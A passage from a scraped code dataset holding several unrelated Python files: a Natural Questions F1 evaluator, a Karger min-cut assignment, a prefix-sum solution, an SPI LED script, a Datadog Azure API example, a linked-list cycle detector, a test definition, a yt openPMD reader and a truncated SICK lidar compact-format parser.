or\n short answer span both in terms of byte offsets and token offsets. We do not\n expect participants to supply both.\n\n The order of preference is:\n\n if start_byte >= 0 and end_byte >=0, use byte offsets,\n else if start_token >= 0 and end_token >= 0, use token offsets,\n else no span is defined (null answer).\n\n The short answer metric takes both short answer spans, and the yes/no answer\n into account. If the 'short_answers' list contains any non/null spans, then\n 'yes_no_answer' should be set to 'NONE'.\n\n -----------------------------------------------------------------------------\n\n Metrics:\n\n If >= 2 of the annotators marked a non-null long answer, then the prediction\n must match any one of the non-null long answers to be considered correct.\n\n If >= 2 of the annotators marked a non-null set of short answers, or a yes/no\n answer, then the short answers prediction must match any one of the non-null\n sets of short answers *or* the yes/no prediction must match one of the\n non-null yes/no answer labels.\n\n All span comparisons are exact and each individual prediction can be fully\n correct, or incorrect.\n\n Each prediction should be provided with a long answer score, and a short\n answers score. At evaluation time, the evaluation script will find a score\n threshold at which F1 is maximized. All predictions with scores below this\n threshold are ignored (assumed to be null). If the score is not provided,\n the evaluation script considers all predictions to be valid. The script\n will also output the maximum recall at precision points of >= 0.5, >= 0.75,\n and >= 0.9.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom interval import Interval, IntervalSet\nfrom collections import OrderedDict\nimport json\nimport os\nimport pickle\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport eval_utils as util\n\nflags.DEFINE_string(\n 'gold_path', 'sample/gold.gz', 'Path to the gzip JSON data. For '\n 'multiple files, should be a glob '\n 'pattern (e.g. \"/path/to/files-*\"')\nflags.DEFINE_string('predictions_path', 'sample/pred.json', 'Path to prediction JSON.')\nflags.DEFINE_bool(\n 'cache_gold_data', False,\n 'Whether to cache gold data in Pickle format to speed up '\n 'multiple evaluations.')\nflags.DEFINE_integer('num_threads', 10, 'Number of threads for reading.')\n#flags.DEFINE_bool('pretty_print', True, 'Whether to pretty print output.')\nflags.DEFINE_bool('optimal_threshold', False, 'Whether to adjust threshold');\n\nFLAGS = flags.FLAGS\n\n\ndef safe_divide(x, y):\n \"\"\"Compute x / y, but return 0 if y is zero.\"\"\"\n if y == 0:\n return 0\n else:\n return x / y\n\ndef score_short_answer(gold_label_list, pred_label, threshold = 0):\n \"\"\"Scores a short answer as correct or not.\n\n 1) First decide if there is a gold short answer with SHORT_NO_NULL_THRESHOLD.\n 2) The prediction will get a F1 if:\n a. There is a gold short answer.\n b. The prediction span *set* match exactly with *one* of the non-null gold\n short answer span *set*.\n\n Args:\n gold_label_list: A list of NQLabel.\n pred_label: A single NQLabel.\n\n Returns:\n gold_has_answer, pred_has_answer, f1, score\n \"\"\"\n #print(gold_label_list)\n #print(pred_label)\n # There is a gold short answer if gold_label_list not empty and non null\n # answers is over the threshold (sum over annotators).\n gold_has_answer = util.gold_has_short_answer(gold_label_list)\n\n # There is a pred long answer if pred_label is not empty and short answer\n # set is not empty.\n\n pred_has_answer = pred_label and (\n (not util.is_null_span_list(pred_label.short_answer_span_list, pred_label.short_score_list, threshold)) or\n pred_label.yes_no_answer != 'none')\n\n f1 = 0\n p = 0\n r = 0\n # score = pred_label.short_score\n\n # Both sides have short answers, which contains yes/no questions.\n if gold_has_answer and pred_has_answer:\n if pred_label.yes_no_answer != 'none': # System thinks its y/n questions.\n for gold_label in gold_label_list:\n if pred_label.yes_no_answer == gold_label.yes_no_answer:\n f1 = 1\n p = 1\n r = 1\n break\n else:\n # 抽取式答案比对\n for gold_label in gold_label_list:\n gold_set = []\n pred_set = []\n for span, score in zip(pred_label.short_answer_span_list, pred_label.short_score_list):\n if score >= threshold:\n pred_set += [(span.start_token_idx, span.end_token_idx)]\n for span in gold_label.short_answer_span_list:\n gold_set += [(span.start_token_idx, span.end_token_idx)]\n\n # 这里对gold_Set 进行处理\n\n #print(gold_set)\n\n def concat_gold_set(gold_set):\n \n def takeFirst(elem):\n return elem[0]\n gold_set.sort(key=takeFirst)\n\n new_set = []\n current_start = gold_set[0][0]\n current_end = gold_set[0][1]\n for i in range(1,len(gold_set)):\n start = gold_set[i][0]\n end = gold_set[i][1]\n if(start-current_end>5):\n new_set.append([current_start,current_end])\n current_end = end\n current_start = start\n else:\n current_end = end\n \n new_set.append([current_start,current_end])\n return new_set\n\n gold_set = concat_gold_set(gold_set)\n #print(pred_set)\n #print(gold_set)\n #print(\"-------------------------------------------\")\n def count_same(span_list, interval_set):\n sum = 0\n for span in span_list:\n for interval in interval_set:\n if span[0] == interval[0] and span[1] == interval[1]:\n sum += 1\n break\n return sum\n correct_interval = count_same(pred_set, gold_set)\n precision = safe_divide(correct_interval, len(pred_set))\n recall = safe_divide(correct_interval, len(gold_set))\n\n if safe_divide(2 * precision * recall, precision + recall) > f1:\n f1 = safe_divide(2 * precision * recall, precision + recall)\n p = precision\n r = recall\n elif not gold_has_answer and not pred_has_answer:\n f1 = 1\n p = 1\n r = 1\n\n return gold_has_answer, pred_has_answer, f1, p, r\n\ndef get_f1(gold_annotation_dict, pred_dict):\n gold_id_set = set(gold_annotation_dict.keys())\n pred_id_set = set(pred_dict.keys())\n\n if gold_id_set.symmetric_difference(pred_id_set):\n #print(\"gold_id_set\", gold_id_set)\n #print(\"pred_id_set\", pred_id_set)\n raise ValueError('ERROR: the example ids in gold annotations and example '\n 'ids in the prediction are not equal.')\n\n final_f1 = 0\n final_p = 0\n final_r = 0\n if FLAGS.optimal_threshold == True:\n score_list = []\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n for score in pred.short_score_list:\n score_list += [score]\n\n score_list += [0]\n score_list.sort()\n #print('score_list', score_list)\n for threshold in score_list:\n sum_f1 = 0\n sum_p = 0\n sum_r = 0\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n #print(pred)\n #print(gold)\n gold_has_answer, pred_has_answer, f1, p, r = score_short_answer(gold, pred, threshold)\n # print('threshold, f1, gold_has_answer, pred_has_answer', \\\n # threshold, f1, gold_has_answer, pred_has_answer)\n sum_f1 += f1\n sum_p += p\n sum_r += r\n # print('threshold, f1, p, r', \\\n # threshold, safe_divide(sum_f1, len(gold_id_set)), safe_divide(sum_p, len(gold_id_set)), safe_divide(sum_r, len(gold_id_set)))\n if safe_divide(sum_f1, len(gold_id_set)) > final_f1:\n final_f1 = safe_divide(sum_f1, len(gold_id_set))\n final_p = safe_divide(sum_p, len(gold_id_set))\n final_r = safe_divide(sum_r, len(gold_id_set))\n else:\n # 标准模式\n sum_f1 = 0\n sum_p = 0\n sum_r = 0\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n gold_has_answer, pred_has_answer, f1, p, r = score_short_answer(gold, pred)\n sum_f1 += f1\n sum_p += p\n sum_r += r\n final_f1 = safe_divide(sum_f1, len(gold_id_set))\n final_p = safe_divide(sum_p, len(gold_id_set))\n final_r = safe_divide(sum_r, len(gold_id_set))\n print(len(gold_id_set))\n\n #final f1\n #final_f1 = 2*safe_divide(final_p*final_r,final_p+final_r)\n return final_f1, final_p, final_r\n\n\ndef main(_):\n cache_path = os.path.join(os.path.dirname(FLAGS.gold_path), 'cache')\n if FLAGS.cache_gold_data and os.path.exists(cache_path):\n logging.info('Reading from cache: %s', format(cache_path))\n nq_gold_dict = pickle.load(open(cache_path, 'r'))\n else:\n nq_gold_dict = util.read_annotation(\n FLAGS.gold_path, n_threads=FLAGS.num_threads)\n if FLAGS.cache_gold_data:\n logging.info('Caching gold data for next time to: %s', format(cache_path))\n pickle.dump(nq_gold_dict, open(cache_path, 'w'))\n\n nq_pred_dict = util.read_prediction_json(FLAGS.predictions_path)\n\n ## input: nq_gold_dict, nq_pred_dict\n ## output: long, short score (with optional optimal threshold)\n\n print('final f1, final_p, final_r', get_f1(nq_gold_dict, nq_pred_dict))\n\nif __name__ == '__main__':\n # flags.mark_flag_as_required('gold_path')\n # flags.mark_flag_as_required('predictions_path')\n app.run(main)\n","repo_name":"zzhao1998/nq_model","sub_path":"bert_joint/nq_eval_new.py","file_name":"nq_eval_new.py","file_ext":"py","file_size_in_byte":10972,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"7147532391","text":"'''\nCoursera - Algorithms Specialization, Stanford - Programming Assignment - Course 1 Week 2\nSerena Rosignoli, 2023\n\nThe file contains the adjacency list representation of a simple undirected graph.\nThere are 200 vertices labeled 1 to 200.\nThe first column in the file represents the vertex label, and the particular row (other entries except the first column) tells all the vertices that the vertex is adjacent to.\nSo for example, the 6th6th row looks like : \"6\t155\t56\t52\t120\t......\". This just means that the vertex with label 6 is adjacent to (i.e., shares an edge with) the vertices with labels 155,56,52,120,......,etc\n\nYour task is to code up and run the randomized contraction algorithm for the min cut problem and use it on the above graph to compute the min cut. (HINT: Note that you'll have to figure out an implementation of edge contractions. Initially, you might want to do this naively, creating a new graph from the old every time there's an edge contraction. But you should also think about more efficient implementations.) (WARNING: As per the video lectures, please make sure to run the algorithm many times with different random seeds, and remember the smallest cut that you ever find.) Write your numeric answer in the space provided. So e.g., if your answer is 5, just type 5 in the space provided.\n'''\n\n\nimport math\nimport random\n\nclass UndirectedGraph:\n\n def __init__(self, vertices):\n self.adj_vertices = []\n while vertices > 0:\n self.adj_vertices.append([])\n vertices -= 1\n\n\n def copy(self):\n res = UndirectedGraph(0)\n for l in self.adj_vertices:\n res.adj_vertices.append(l[:])\n return res\n\n\n def add_edge(self, i, j):\n # Assuming there will be a\n # call of self.add_edge(j, i)\n self.adj_vertices[i].append(j)\n\n def n(self):\n return len(self.adj_vertices)\n\n\n def merge_karger(self, i, j):\n\n i_adj = self.adj_vertices[i]\n k = 0\n while k < len(i_adj):\n if i_adj[k] == j:\n i_adj.pop(k)\n k -= 1\n k += 1\n\n for v in self.adj_vertices[j]:\n if (v != i):\n self.add_edge(i, v)\n v_adj = self.adj_vertices[v]\n # Assuming undirected graph\n k = 0\n l = len(v_adj)\n while k < l:\n if(v_adj[k] == j):\n v_adj[k] = i\n break\n k += 1\n\n # Optimization: instead of computing a new graph\n # just swap j-th and (n-1)-th lines 'in-place'\n self.adj_vertices[j] = self.adj_vertices[self.n()-1]\n for v in self.adj_vertices[j]:\n v_adj = self.adj_vertices[v]\n # Assuming undirected graph\n k = 0\n l = len(v_adj)\n while k < l:\n if(v_adj[k] == (self.n()-1)):\n v_adj[k] = j\n break\n k += 1\n self.adj_vertices.pop()\n\n\n\ndef _kargerMinCut(graph, seed):\n\n # Each time - new seed\n random.seed(seed)\n\n while graph.n() > 2:\n # Picking random edge\n i = random.randint(0, graph.n()-1)\n adj = graph.adj_vertices[i]\n j = random.choice(adj)\n\n graph.merge_karger(i, j)\n\n # Two vertices remain\n return len(graph.adj_vertices[0])\n\n\ndef kargerMinCut(graph, N):\n '''\n Computes the minimum cut of the graph.\n\n Running time lower bound is Omega(N * m), where\n N - number of iterations,\n m - number of graph edges.\n\n For high success probability (1/n failure chance),\n use N = n^2 * log(n).\n '''\n\n i = 0\n\n # (!) Working with the copy of the graph,\n # not destroying the original one\n min_res = _kargerMinCut(graph.copy(), i)\n while i < N:\n t = _kargerMinCut(graph.copy(), i)\n print(str(i)+': '+str(t))\n if t < min_res: min_res = t\n i += 1\n\n return min_res\n\n\ndef main():\n\n f = open('kargerMinCut.txt')\n # (!) Even better approach to reading line than in PA2\n lines = f.read().splitlines()\n f.close()\n\n graph = UndirectedGraph(200)\n\n for line in lines:\n lst = line.split('\\t')\n t = int(lst[0])-1\n for i in lst[1:-1]:\n v = int(i)-1\n graph.add_edge(t, v)\n\n # To get (1/n) failure probability,\n # repeat the basic procedure n^2 * log(n) times\n\n N = math.log(graph.n()) #graph.n()**2 * math.log(graph.n())\n print(N)\n for i in range(5):\n print(kargerMinCut(graph, i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SerenaRosi/AlgorithmsSpecializationStanford","sub_path":"Course1/kargermincut.py","file_name":"kargermincut.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69873608082","text":"import sys\nN, M = map(int, sys.stdin.readline().strip().split())\narr = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(N)]\nsum_arr = [[0]*(N+1) for _ in range(N+1)]\n\n# 누적합 구하기\nfor i in range(1, N+1):\n for j in range(1, N+1):\n sum_arr[i][j] = arr[i-1][j-1] + sum_arr[i-1][j] + sum_arr[i][j-1] - sum_arr[i-1][j-1]\n\n# print(sum_arr)\n# 부분합 구하기\nfor _ in range(M):\n x1, y1, x2, y2 = map(int, sys.stdin.readline().strip().split())\n x1 -= 1\n x2 -= 1\n y1 -= 1\n y2 -= 1\n print(sum_arr[x2+1][y2+1] - sum_arr[x2+1][y1] - sum_arr[x1][y2+1] + sum_arr[x1][y1])","repo_name":"auddus16/Algorithm_python","sub_path":"구간합/11660_구간합구하기5.py","file_name":"11660_구간합구하기5.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29846979121","text":"import spidev\nimport time\n\nBUS = 0\nDEVICE = 1\n\nPORT = 1 # PORTB\nLED = 5\nMAX_STEPS = 15\n\nspi = spidev.SpiDev()\nspi.open(BUS, DEVICE)\nspi.max_speed_hz = 100000\n\ndelay = 1\nmodif = 1\nwhile True:\n if delay >= MAX_STEPS:\n modif = -1\n elif delay <= 1:\n modif = 1\n\n spi.xfer([PORT, 1 << LED, 0xFF])\n time.sleep(1.0 / delay)\n spi.xfer([PORT, 1 << LED, 0x00])\n time.sleep(1.0 / delay)\n print(1.0 / delay)\n\n delay += 1 * modif\n","repo_name":"trnila/rpi_ctrl","sub_path":"spi.py","file_name":"spi.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39701164664","text":"from datadog import initialize, api\n\noptions = {\n 'api_key': '<DATADOG_API_KEY>',\n 'app_key': '<DATADOG_APPLICATION_KEY>'\n}\n\ninitialize(**options)\n\napi.AzureIntegration.update_host_filters(\n tenant_name=\"<AZURE_TENANT_NAME>\",\n host_filters=\"new:filters\",\n client_id=\"<AZURE_CLIENT_ID>\"\n)\n","repo_name":"DataDog/documentation","sub_path":"content/en/api/v1/azure-integration/UpdateAzureHostFilters.py","file_name":"UpdateAzureHostFilters.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"3"} +{"seq_id":"15917171734","text":"\"\"\"\n给定一个链表, **返回链表开始入环的第一个节点**, 若链表无环,则返回`None`\n\n**说明**\n* 不允许修改链表\n* 使用$O(1)$的空间\n\n**注意**\n这个和`hasCycle`相比,更近一步:返回环的第一个节点, 而不是Bool 值\n\"\"\"\n\n\nclass ListNode:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def __repr__(self):\n return f\"List Node with value: {self.value}\"\n\n\ndef detectCycle(node):\n fast = node\n slow = node\n\n while True:\n if not (fast and fast.next):\n return\n fast = fast.next.next\n slow = slow.next\n # fast and slow meet the first time\n # fast reset, and slow continue in the cycle\n if fast == slow:\n break\n # reset fast to the head\n fast = head\n # both in the cycle, if they meet, fast will be the entry of the cycle\n while fast != slow:\n fast = fast.next\n slow = slow.next\n\n return fast\n\n\nif __name__ == '__main__':\n head = ListNode(5)\n node3 = ListNode(3)\n node2 = ListNode(2)\n node7 = ListNode(7)\n node1 = ListNode(1)\n node6 = ListNode(6)\n node8 = ListNode(8)\n node9 = ListNode(9)\n node4 = ListNode(4)\n\n head.next = node3\n node3.next = node2\n node2.next = node7\n node7.next = node1\n node1.next = node6\n node6.next = node8\n node8.next = node9\n node9.next = node4\n node4.next = node1\n\n print(detectCycle(node=head))\n\n head2 = ListNode(-1)\n print(detectCycle(node=head2))\n","repo_name":"JL1829/LeetCode","sub_path":"src/detectCycle.py","file_name":"detectCycle.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42309557966","text":"\n# Tests in Python for some scripttestlib features that are difficult to test in\n# test_scripttestlib.py\n\n\n_defs = {\n 'empty_output': {\n 'stdout': '',\n 'stderr': '',\n 'returncode': 0,\n },\n}\n\ntestcases = [\n {\n 'name': 'scripttestlib: Reference a reusable definition in Python',\n 'input': {\n 'cmdline': 'cat /dev/null',\n },\n 'output': _defs['empty_output'],\n },\n]\n","repo_name":"CSCfi/Kielipankki-utilities","sub_path":"vrt-tools/tests/scripttests/scripttest_scripttestlib.py","file_name":"scripttest_scripttestlib.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"42057007396","text":"from collections import defaultdict\n\nimport numpy as np\n\nfrom yt.frontends.open_pmd.misc import get_component, is_const_component\nfrom yt.geometry.selection_routines import GridSelector\nfrom yt.utilities.io_handler import BaseIOHandler\n\n\nclass IOHandlerOpenPMDHDF5(BaseIOHandler):\n _field_dtype = \"float32\"\n _dataset_type = \"openPMD\"\n\n def __init__(self, ds, *args, **kwargs):\n self.ds = ds\n self._handle = ds._handle\n self.base_path = ds.base_path\n self.meshes_path = ds.meshes_path\n self.particles_path = ds.particles_path\n self._array_fields = {}\n self._cached_ptype = \"\"\n\n def _fill_cache(self, ptype, index=0, offset=None):\n \"\"\"Fills the particle position cache for the ``ptype``.\n\n Parameters\n ----------\n ptype : str\n The on-disk name of the particle species\n index : int, optional\n offset : int, optional\n \"\"\"\n if str((ptype, index, offset)) not in self._cached_ptype:\n self._cached_ptype = str((ptype, index, offset))\n pds = self._handle[self.base_path + self.particles_path + \"/\" + ptype]\n axes = list(pds[\"position\"].keys())\n if offset is None:\n if is_const_component(pds[\"position/\" + axes[0]]):\n offset = pds[\"position/\" + axes[0]].attrs[\"shape\"]\n else:\n offset = pds[\"position/\" + axes[0]].len()\n self.cache = np.empty((3, offset), dtype=np.float64)\n for i in np.arange(3):\n ax = \"xyz\"[i]\n if ax in axes:\n np.add(\n get_component(pds, \"position/\" + ax, index, offset),\n get_component(pds, \"positionOffset/\" + ax, index, offset),\n self.cache[i],\n )\n else:\n # Pad accordingly with zeros to make 1D/2D datasets compatible\n # These have to be the same shape as the existing axes since that\n # equals the number of particles\n self.cache[i] = np.zeros(offset)\n\n def _read_particle_selection(self, chunks, selector, fields):\n \"\"\"Read particle fields for particle species masked by a selection.\n\n Parameters\n ----------\n chunks\n A list of chunks\n A chunk is a list of grids\n selector\n A region (inside your domain) specifying which parts of the field\n you want to read. See [1] and [2]\n fields : array_like\n Tuples (ptype, pfield) representing a field\n\n Returns\n -------\n dict\n keys are tuples (ptype, pfield) representing a field\n values are (N,) ndarrays with data from that field\n \"\"\"\n f = self._handle\n bp = self.base_path\n pp = self.particles_path\n ds = f[bp + pp]\n unions = self.ds.particle_unions\n chunks = list(chunks) # chunks is a generator\n\n rv = {}\n ind = {}\n particle_count = {}\n ptf = defaultdict(list) # ParticleTypes&Fields\n rfm = defaultdict(list) # RequestFieldMapping\n\n for ptype, pname in fields:\n pfield = (ptype, pname)\n # Overestimate the size of all pfields so they include all particles\n # and shrink it later\n particle_count[pfield] = 0\n if ptype in unions:\n for pt in unions[ptype]:\n particle_count[pfield] += self.ds.particle_type_counts[pt]\n ptf[pt].append(pname)\n rfm[pt, pname].append(pfield)\n else:\n particle_count[pfield] = self.ds.particle_type_counts[ptype]\n ptf[ptype].append(pname)\n rfm[pfield].append(pfield)\n rv[pfield] = np.empty((particle_count[pfield],), dtype=np.float64)\n ind[pfield] = 0\n\n for ptype in ptf:\n for chunk in chunks:\n for grid in chunk.objs:\n if str(ptype) == \"io\":\n species = list(ds.keys())[0]\n else:\n species = ptype\n if species not in grid.ptypes:\n continue\n # read particle coords into cache\n self._fill_cache(species, grid.pindex, grid.poffset)\n mask = selector.select_points(\n self.cache[0], self.cache[1], self.cache[2], 0.0\n )\n if mask is None:\n continue\n pds = ds[species]\n for field in ptf[ptype]:\n component = \"/\".join(field.split(\"_\")[1:])\n component = component.replace(\"positionCoarse\", \"position\")\n component = component.replace(\"-\", \"_\")\n data = get_component(pds, component, grid.pindex, grid.poffset)[\n mask\n ]\n for request_field in rfm[(ptype, field)]:\n rv[request_field][\n ind[request_field] : ind[request_field] + data.shape[0]\n ] = data\n ind[request_field] += data.shape[0]\n\n for field in fields:\n rv[field] = rv[field][: ind[field]]\n\n return rv\n\n def _read_fluid_selection(self, chunks, selector, fields, size):\n \"\"\"Reads given fields masked by a given selection.\n\n Parameters\n ----------\n chunks\n A list of chunks\n A chunk is a list of grids\n selector\n A region (inside your domain) specifying which parts of the field\n you want to read. See [1] and [2]\n fields : array_like\n Tuples (fname, ftype) representing a field\n size : int\n Size of the data to read\n\n Returns\n -------\n dict\n keys are tuples (ftype, fname) representing a field\n values are flat (``size``,) ndarrays with data from that field\n \"\"\"\n f = self._handle\n bp = self.base_path\n mp = self.meshes_path\n ds = f[bp + mp]\n chunks = list(chunks)\n\n rv = {}\n ind = {}\n\n if isinstance(selector, GridSelector):\n if not (len(chunks) == len(chunks[0].objs) == 1):\n raise RuntimeError\n\n if size is None:\n size = sum(g.count(selector) for chunk in chunks for g in chunk.objs)\n for field in fields:\n rv[field] = np.empty(size, dtype=np.float64)\n ind[field] = 0\n\n for ftype, fname in fields:\n field = (ftype, fname)\n for chunk in chunks:\n for grid in chunk.objs:\n mask = grid._get_selector_mask(selector)\n if mask is None:\n continue\n component = fname.replace(\"_\", \"/\").replace(\"-\", \"_\")\n if component.split(\"/\")[0] not in grid.ftypes:\n data = np.full(grid.ActiveDimensions, 0, dtype=np.float64)\n else:\n data = get_component(ds, component, grid.findex, grid.foffset)\n # The following is a modified AMRGridPatch.select(...)\n data.shape = (\n mask.shape\n ) # Workaround - casts a 2D (x,y) array to 3D (x,y,1)\n count = grid.count(selector)\n rv[field][ind[field] : ind[field] + count] = data[mask]\n ind[field] += count\n\n for field in fields:\n rv[field] = rv[field][: ind[field]]\n rv[field].flatten()\n\n return rv\n","repo_name":"yt-project/yt","sub_path":"yt/frontends/open_pmd/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"3"} +{"seq_id":"11421754021","text":"from scansegmentdecoding import connectionHandler\n\nimport numpy as np\nimport struct\nimport sys\nimport zlib\n\n\ndef parseFromFile(filename):\n \"\"\"\n Reads a Compact formatted binary file and parses its content to a dictionary.\n \"\"\"\n with open(filename, \"rb\") as f:\n print(f\"Parsing {filename}...\")\n byte_data = f.read()\n payload = _verifyAndExtractPayload(byte_data)\n return parsePayload(payload)\n\n\ndef parsePayload(payload):\n \"\"\"\n Parses a Compact formatted byte array into a dictionary.\n \"\"\"\n #\n # In compact format the payload consists of a header which is 32 bytes long and zero or more modules of variable\n # length depending on the number of layers in the segment. The header stores the size of the very first module\n # whereas each module stores the size of the folloing module in its metadata.\n #\n # | Header | Module 1 | Module 2 | ...\n # 0 32 X Y\n #\n # With X = size of module 1 + 32\n # Y = size of module 2 + size of module 1 + 32\n #\n result = {\n \"Modules\": []\n }\n (header, next_module_size) = _readHeader(payload)\n last_module_size = 0\n\n result.update(header)\n\n offset = 32 # 32 bytes header size\n while next_module_size > 0:\n last_module_size = next_module_size\n (module_data, next_module_size) = _readNextModule(payload, offset)\n if module_data is None:\n print(f\"Failed to read module data.\", file=sys.stderr)\n return None\n result[\"Modules\"].append(module_data)\n offset += last_module_size\n\n return result\n\n\ndef _verifyAndExtractPayload(data):\n \"\"\"\n Checks for the STX byte sequence and applies CRC.\n \"\"\"\n bytes_frame_start = data[0:4]\n bytes_crc = data[-4:]\n # CRC is computed over whole data including the frame start bytes.\n bytes_payload = data[0:-4]\n\n # Check if frame header is included.\n if b'\\x02\\x02\\x02\\x02' != bytes_frame_start:\n print(\n \"Missing start of frame sequence [0x02 0x02 0x02 0x02].\", file=sys.stderr)\n return None\n\n # Apply CRC\n expected_crc = int.from_bytes(bytes_crc, 'little')\n computed_crc = zlib.crc32(bytes_payload)\n if expected_crc != computed_crc:\n print(\n f\"CRC failed. Expected {expected_crc}, got {computed_crc}.\", file=sys.stderr)\n return None\n\n return bytes_payload\n\n\ndef _readHeader(data):\n \"\"\"\n Reads the header data from the given compact formatted data array.\n \"\"\"\n # The header itself is 32 bytes long.\n #\n # | <STX><STX><STX><STX> | CommandId | TelegramCounter | TimestampTransmit | Version | ModuleSize |\n # 0 4 8 16 24 28 32\n #\n command_id, _ = _readUint32(data, 4)\n telegram_counter, _ = _readUint64(data, 8)\n timestamp_transmit, _ = _readUint64(data, 16)\n version, _ = _readUint32(data, 24)\n next_module_size, _ = _readUint32(data, 28)\n\n header = {\n 'CommandId': command_id,\n 'TelegramCounter': telegram_counter,\n 'TimestampTransmit': timestamp_transmit,\n 'Version': version\n }\n return (header, next_module_size)\n\n\ndef _readNextModule(data, offset):\n \"\"\"\n Reads the module at the given offset.\n \"\"\"\n #\n # A module always consists of two blocks of variable lengths. The first block contains the metadata describing\n # the actual contents of the module (beamdata) which is stored in the second block.\n #\n # | STX | Header | Module 1 | Module 2 | ...\n # 0 4 32 X Y\n # | | +---------------------------------+\n # | | |\n # | +----------------+ |\n # | | |\n # ... | Metadata 1 | Beamdata 1 | Metadata 2 | Beamdata 2 | ...\n #\n metadata, next_module_size, offset = _readMetaData(data, offset)\n beamdata = _readBeamData(data, metadata, offset)\n\n # Merge metadata and beam data into a single dictionary.\n module_data = {}\n module_data.update(metadata)\n module_data.update(beamdata)\n\n return (module_data, next_module_size)\n\n\ndef _readMetaData(data, offset):\n # The metadata itself has variable length depending on the number layers which is also encoded in this block.\n # For example consider a block starting at offset X:\n #\n # | SegmentCounter | FrameNumber | SenderId | NumLayers | BeamCount | EchoCount |\n # X X+8 X+16 X+20 X+24 X+28 X+32\n #\n # The first portion of the metadata has a fixed length of 32 byte. Afterwards array data is included:\n #\n # | TimestampStart | TimestampStop | Phi | ThetaStart | ThetaStop | DistanceScalingFactor\n # X+32 +(NumLayers*8) +(NumLayers*8) +(NumLayers*4) +(NumLayers*4) +(NumLayers*4) + 4\n #\n # In sum this block stops at byte offset Y = (X+32)+(2*NumLayers*8)+(3*NumLayers*4)+4 = (X+32)+(28*NumLayers)+4\n # Finally, the block is concluded with a fixed size portion again:\n #\n # | NextModuleSize | Availability | DataContentEchos | DataContentBeams | Reserved |\n # Y Y+4 Y+5 Y+6 Y+7 Y+8\n #\n segment_counter, offset = _readUint64(data, offset)\n frame_number, offset = _readUint64(data, offset)\n sender_id, offset = _readUint32(data, offset)\n num_layers, offset = _readUint32(data, offset)\n beam_count, offset = _readUint32(data, offset)\n echo_count, offset = _readUint32(data, offset)\n timestamp_start, offset = _readUint64Array(data, num_layers, offset)\n timestamp_stop, offset = _readUint64Array(data, num_layers, offset)\n phi, offset = _readFloat32Array(data, num_layers, offset)\n theta_start, offset = _readFloat32Array(data, num_layers, offset)\n theta_stop, offset = _readFloat32Array(data, num_layers, offset)\n distance_scaling_factor, offset = _readFloat32(data, offset)\n next_module_size, offset = _readUint32(data, offset)\n availability, offset = _readUint8(data, offset)\n data_content_echos, offset = _readUint8(data, offset)\n data_content_beams, offset = _readUint8(data, offset)\n reserved, offset = _readUint8(data, offset)\n\n # Bit mask to be applied on the 'data_content' variables.\n mask_distance_available = 0x01\n mask_rssi_available = 0x02\n mask_properties_available = 0x01\n mask_theta_available = 0x02\n\n metaData = {\n \"SegmentCounter\": segment_counter,\n \"FrameNumber\": frame_number,\n \"SenderId\": sender_id,\n \"NumberOfLinesInModule\": num_layers,\n \"NumberOfBeamsPerScan\": beam_count,\n \"NumberOfEchosPerBeam\": echo_count,\n \"TimestampStart\": timestamp_start,\n \"TimestampStop\": timestamp_stop,\n \"Phi\": phi,\n \"ThetaStart\": theta_start,\n \"ThetaStop\": theta_stop,\n \"DistanceScalingFactor\": distance_scaling_factor,\n \"Availability\": availability,\n \"DataContentEchos\": data_content_echos,\n \"DataContentBeams\": data_content_beams,\n \"HasDistance\": ((data_content_echos & mask_distance_available) != 0),\n \"HasRssi\": ((data_content_echos & mask_rssi_available) != 0),\n \"HasProperties\": ((data_content_beams & mask_properties_available) != 0),\n \"HasTheta\": ((data_content_beams & mask_theta_available) != 0)\n\n }\n return (metaData, next_module_size, offset)\n\n\ndef _readBeamData(data, metadata, offset):\n #\n # If all channels are enabled, the beam data always has the following structure:\n #\n # | dist_00 | rssi_00 | ... | dist_0n | rssi_0n | theta_0 | prop_0 | <- Data of beam 0\n # | dist_10 | rssi_10 | ... | dist_1n | rssi_1n | theta_1 | prop_1 | <- Data of beam 1\n # ...\n # | dist_m0 | rssi_m0 | ... | dist_mn | rssi_mn | theta_m | prop_m | <- Data of beam m\n #\n # whereas dist_mn and rssi_mn are the distance and rssi values respectively for beam m and echo n.\n # theta_m and prop_m are theta and property values of beam m respectively.\n # Only distance values are required. More than one echos are optional as well as existence of rssi, theta and\n # property data. Therefore the bare minimum a segment in compact format can have is:\n #\n # | dist_00 | dist_10 | ... | dist_m0 | <- One single distance value for each of the m beams (each with only one echo).\n #\n num_layers = metadata[\"NumberOfLinesInModule\"]\n num_echos = metadata[\"NumberOfEchosPerBeam\"]\n num_beams = metadata[\"NumberOfBeamsPerScan\"]\n\n # Prepare result object by creating an array of empty, zero-initialized dictionaries, one for each layer.\n result = [{\n # Matrix of size num_echos * num_beams.\n 'Rssi': [np.zeros(num_beams) for n in range(num_echos)],\n # Matrix of size num_echos * num_beams.\n 'Distance': [np.zeros(num_beams) for n in range(num_echos)],\n 